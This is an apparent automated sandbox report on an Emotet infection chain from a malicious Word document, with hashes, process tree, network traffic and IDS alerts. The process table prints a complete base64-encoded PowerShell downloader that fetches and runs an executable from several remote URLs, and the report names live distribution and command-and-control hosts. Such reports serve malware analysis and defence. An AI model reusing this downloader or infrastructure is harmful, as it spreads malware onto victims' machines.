URL: | http://web-extend.nl/cgi-bin/v0x8-dc8q-06/ |
Full analysis: | https://app.any.run/tasks/e2706005-b087-4826-9865-ce537914635d |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | August 08, 2020, 10:02:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | 85F294C9BE15358F5E14191911F285C5 |
SHA1: | 6EBFD336A5780F17C1F46308F6F199BE51375AA3 |
SHA256: | 597DC3A835BFA376B4453B26F92A7B4EA48F3C644E4F709D03885A4EE83D7E47 |
SSDEEP: | 3:N1KJAUB/vyKI3dfU:COYiKIK |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2492 | "C:\Program Files\Internet Explorer\iexplore.exe" http://web-extend.nl/cgi-bin/v0x8-dc8q-06/ | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
2684 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2492 CREDAT:267521 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
3868 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\Inv_GTZA568_276367977.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3900 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2816 | powersheLL -e JABNAEoAUABXAEsAdQBvAG0APQAnAEEAVABKAEsATwBmAG8AYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIAYABJAGAAVABZAFAAYABSAG8AVABvAGMATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAUABGAE8ARwBLAGsAZgBjACAAPQAgACcANAA3ADAAJwA7ACQAUQBMAEUATwBNAHgAYwB2AD0AJwBNAEkAVwBPAEoAegB0AHIAJwA7ACQAUwBQAEMATwBaAHcAegB2AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABQAEYATwBHAEsAawBmAGMAKwAnAC4AZQB4AGUAJwA7ACQAVgBGAEgAWgBNAG8AegBjAD0AJwBFAFIASQBTAEgAeQBpAGwAJwA7ACQATwBVAEIAVQBHAGcAdgBiAD0AJgAoACcAbgBlAHcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAVAAuAFcAZQBiAGMAbABJAEUAbgBUADsAJABGAEsAQgBOAEkAeQByAGIAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAHIAYQB0AGgAaQBvAHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGQAZwBmAFEARgB3AGEAYQBxAHYAaQA3ADYAMQAzADgALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGkAZABhAHAAaAB1AGMAcABoAGEAdAAuAGMAbwBtAC8AYwBmAGEAdABwAC8AUAB2AG0AWABPAG0AMwB1AG0ANAAwADgAMwA2ADQANQAvACoAaAB0AHQAcABzADoALwAvAHQAbwB5AG8AbwAuAHMAaABvAHAALwBtAG8AbAB0AC8AcQBwAGMAdABxADEAMQAvACoAaAB0AHQAcAA6AC8ALwBsAGkAZgBlAGgAdQBiAC4AcwBoAG8AcAAvAHMAaQB0AGUAcwAvAFgAVgB3AEMARABLAC8AKgBoAHQAdABwADoALwAvAHYAYQB5AHYAbwBuAHQAaQBuAGMAaABhAHAANQBzAC4AYwBvAG0ALwB2AGEAeQB2AG8AbgA1AHMALgBjAG8AbQAvAGIAVQBsADAAZwB4AG0ANAAwADgAMAAzADkALwAnAC4AIgBTAFAAYABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEgAVgBEAFoASAB5AGoAYQA9ACcARABFAFoATABWAG4AbABoACcAOwBmAG8AcgBlAGEAYwBoACgAJABTAFQASABVAEwAcgBmAGIAIABpAG4AIAAkAEYASwBCAE4ASQB5AHIAYgApAHsAdAByAHkAewAkAE8AVQBCAFUARwBnAHYAYgAuACIARABvAHcATgBsAGAATwBgAEEARABGAGkATABFACIAKAAkAFMAVABIAFUATAByAGYAYgAsACAAJABTAFAAQwBPAFoAdwB6AHYAKQA7ACQAUABSAFkAUQBQAGoAZgB4AD0AJwBXAFUAQgBZAEcAeAB0AGwAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABTAFAAQwBPAFoAdwB6AHYAKQAuACIAbABgAEUAYABOAEcAVABoACIAIAAtAGcAZQAgADMANwAzADQAMwApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwBSAEUAQQBgAFQARQAiACgAJABTAFAAQwBPAFoAdwB6AHYAKQA7ACQAVgBYAEkAUQBNAG8AdgB5AD0AJwBUAFYAVgBHAFoAcgBzAHUAJwA7AGIAcgBlAGEAawA7ACQAUgBHAFUAVQBLAHQAbQBnAD0AJwBFAFkAQwBSAEoAcgBtAGwAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASABBAE0AQwBUAGwAbgBkAD0AJwBCAE4AQgBIAE4AZABsAHUAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3000 | C:\Users\admin\470.exe | C:\Users\admin\470.exe | wmiprvse.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1072 | "C:\Users\admin\AppData\Local\ir32_32\C_G18030.exe" | C:\Users\admin\AppData\Local\ir32_32\C_G18030.exe | 470.exe | |
User: admin Integrity Level: MEDIUM Description: TreeEditor MFC Application Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2684 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\Inv_GTZA568_276367977.doc.bw7ykmy.partial | — | |
MD5:— | SHA256:— | |||
2492 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF91F758BFDDD4417D.TMP | — | |
MD5:— | SHA256:— | |||
2492 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\Inv_GTZA568_276367977.doc.bw7ykmy.partial:Zone.Identifier | — | |
MD5:— | SHA256:— | |||
3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDFF0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_4A8893CF-3200-43C8-8DF4-ACCFADFF2E78.0\38066EB7.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2492 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\Cab41F6.tmp | — | |
MD5:— | SHA256:— | |||
2492 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\Tar41F7.tmp | — | |
MD5:— | SHA256:— | |||
2492 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver4237.tmp | — | |
MD5:— | SHA256:— | |||
3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFD634D089F2B4E696.TMP | — | |
MD5:— | SHA256:— | |||
3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF3D170AB7AAEBAE60.TMP | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2492 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
2492 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
2684 | iexplore.exe | GET | 200 | 185.27.142.203:80 | http://web-extend.nl/cgi-bin/v0x8-dc8q-06/ | NL | document | 97.8 Kb | unknown |
1072 | C_G18030.exe | POST | 200 | 78.189.60.109:443 | http://78.189.60.109:443/ZBtAxzrS3H/YTfCWHyJ0RD5jqV/VSELBDrlZwX/ | TR | binary | 132 b | malicious |
2492 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2492 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2492 | iexplore.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
— | — | 185.27.142.203:80 | web-extend.nl | LeaseWeb Netherlands B.V. | NL | unknown |
2684 | iexplore.exe | 185.27.142.203:80 | web-extend.nl | LeaseWeb Netherlands B.V. | NL | unknown |
2816 | powersheLL.exe | 64.227.110.109:443 | crathior.com | Peer 1 Network (USA) Inc. | US | unknown |
1072 | C_G18030.exe | 78.189.60.109:443 | — | Turk Telekom | TR | malicious |
Domain | IP | Reputation |
---|---|---|
web-extend.nl |
| unknown |
iecvlist.microsoft.com |
| whitelisted |
r20swj13mr.microsoft.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
crathior.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
1072 | C_G18030.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 22 |
1072 | C_G18030.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
1072 | C_G18030.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M8 |
1072 | C_G18030.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin M3 |
1072 | C_G18030.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |